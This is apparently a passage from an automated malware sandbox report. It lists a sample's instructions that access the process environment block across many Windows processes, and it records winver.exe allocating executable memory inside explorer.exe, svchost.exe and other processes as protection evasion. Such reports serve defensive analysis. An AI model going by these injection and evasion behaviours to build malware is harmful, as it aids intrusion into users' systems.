Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 11_2_00A40C80 mov eax, dword ptr fs:[00000030h]	11_2_00A40C80
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 11_2_00A4404D mov edi, dword ptr fs:[00000030h]	11_2_00A4404D
Source: C:\Windows\System32\dllhost.exe	Code function: 15_2_005F404D mov edi, dword ptr fs:[00000030h]	15_2_005F404D
Source: C:\Windows\System32\dllhost.exe	Code function: 15_2_005F0C80 mov eax, dword ptr fs:[00000030h]	15_2_005F0C80
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 16_2_0053404D mov edi, dword ptr fs:[00000030h]	16_2_0053404D
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 16_2_00530C80 mov eax, dword ptr fs:[00000030h]	16_2_00530C80
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_00820C80 mov eax, dword ptr fs:[00000030h]	17_2_00820C80
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0082404D mov edi, dword ptr fs:[00000030h]	17_2_0082404D
Source: C:\Windows\System32\smartscreen.exe	Code function: 18_2_0025404D mov edi, dword ptr fs:[00000030h]	18_2_0025404D
Source: C:\Windows\System32\smartscreen.exe	Code function: 18_2_00250C80 mov eax, dword ptr fs:[00000030h]	18_2_00250C80
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 19_2_001C404D mov edi, dword ptr fs:[00000030h]	19_2_001C404D
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 19_2_001C0C80 mov eax, dword ptr fs:[00000030h]	19_2_001C0C80
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 19_2_022502AE mov eax, dword ptr fs:[00000030h]	19_2_022502AE
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 19_2_02250D34 mov eax, dword ptr fs:[00000030h]	19_2_02250D34
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 20_2_00930C80 mov eax, dword ptr fs:[00000030h]	20_2_00930C80
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 20_2_0093404D mov edi, dword ptr fs:[00000030h]	20_2_0093404D
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 22_2_0018404D mov edi, dword ptr fs:[00000030h]	22_2_0018404D
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 22_2_00180C80 mov eax, dword ptr fs:[00000030h]	22_2_00180C80
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_0067404D mov edi, dword ptr fs:[00000030h]	23_2_0067404D
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00670C80 mov eax, dword ptr fs:[00000030h]	23_2_00670C80
Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe	Code function: 24_2_009C0C80 mov eax, dword ptr fs:[00000030h]	24_2_009C0C80
Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe	Code function: 24_2_009C404D mov edi, dword ptr fs:[00000030h]	24_2_009C404D
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00F70C80 mov eax, dword ptr fs:[00000030h]	25_2_00F70C80
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00F7404D mov edi, dword ptr fs:[00000030h]	25_2_00F7404D
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 27_2_00D50C80 mov eax, dword ptr fs:[00000030h]	27_2_00D50C80
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 27_2_00D5404D mov edi, dword ptr fs:[00000030h]	27_2_00D5404D
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 29_2_011A404D mov edi, dword ptr fs:[00000030h]	29_2_011A404D
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 29_2_011A0C80 mov eax, dword ptr fs:[00000030h]	29_2_011A0C80
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_001C404D mov edi, dword ptr fs:[00000030h]	30_2_001C404D
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_001C0C80 mov eax, dword ptr fs:[00000030h]	30_2_001C0C80
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_0214404D mov edi, dword ptr fs:[00000030h]	30_2_0214404D
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_02140C80 mov eax, dword ptr fs:[00000030h]	30_2_02140C80
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_021502AE mov eax, dword ptr fs:[00000030h]	30_2_021502AE
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_02150D34 mov eax, dword ptr fs:[00000030h]	30_2_02150D34
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 31_2_0234404D mov edi, dword ptr fs:[00000030h]	31_2_0234404D
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 31_2_02340C80 mov eax, dword ptr fs:[00000030h]	31_2_02340C80
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 32_2_00D60C80 mov eax, dword ptr fs:[00000030h]	32_2_00D60C80
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 32_2_00D6404D mov edi, dword ptr fs:[00000030h]	32_2_00D6404D
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 33_2_00E10C80 mov eax, dword ptr fs:[00000030h]	33_2_00E10C80
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 33_2_00E1404D mov edi, dword ptr fs:[00000030h]	33_2_00E1404D
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 34_2_001D404D mov edi, dword ptr fs:[00000030h]	34_2_001D404D
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 34_2_001D0C80 mov eax, dword ptr fs:[00000030h]	34_2_001D0C80
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 34_2_008B0CA4 mov eax, dword ptr fs:[00000030h]	34_2_008B0CA4
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 34_2_008B4071 mov edi, dword ptr fs:[00000030h]	34_2_008B4071
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 35_2_0214404D mov edi, dword ptr fs:[00000030h]	35_2_0214404D
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 35_2_02140C80 mov eax, dword ptr fs:[00000030h]	35_2_02140C80
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 36_2_0073404D mov edi, dword ptr fs:[00000030h]	36_2_0073404D
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 36_2_00730C80 mov eax, dword ptr fs:[00000030h]	36_2_00730C80
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 37_2_00B10C80 mov eax, dword ptr fs:[00000030h]	37_2_00B10C80
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 37_2_00B1404D mov edi, dword ptr fs:[00000030h]	37_2_00B1404D
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 38_2_0268404D mov edi, dword ptr fs:[00000030h]	38_2_0268404D
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 38_2_02680C80 mov eax, dword ptr fs:[00000030h]	38_2_02680C80
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 39_2_0255404D mov edi, dword ptr fs:[00000030h]	39_2_0255404D
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 39_2_02550C80 mov eax, dword ptr fs:[00000030h]	39_2_02550C80
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 40_2_0213404D mov edi, dword ptr fs:[00000030h]	40_2_0213404D
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 40_2_02130C80 mov eax, dword ptr fs:[00000030h]	40_2_02130C80

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\explorer.exe base: F80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\sihost.exe base: D00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\svchost.exe base: F00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 190000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 9E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\explorer.exe base: 2DF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 840000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: EE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: A40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: BB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 530000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 820000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 250000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 930000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 980000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 180000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 670000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 9C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\conhost.exe base: F70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\backgroundTaskHost.exe base: 710000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: D50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2340000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: D60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2140000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 730000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2680000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2550000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2130000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2BA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1370000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2ED0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2120000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 28D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 22B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2930000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 25B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2D10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2920000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2480000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2180000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2D60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 14D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 26B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1380000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2840000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 690000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 23B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2F10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 22B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2210000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: C10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: F90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 620000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 860000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 7A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1270000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 690000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: BD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 5F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 920000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 10C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 980000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2000000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: A20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 10F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 13E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1450000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: CB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B90000 protect: page execute and read and write	Jump to behavior
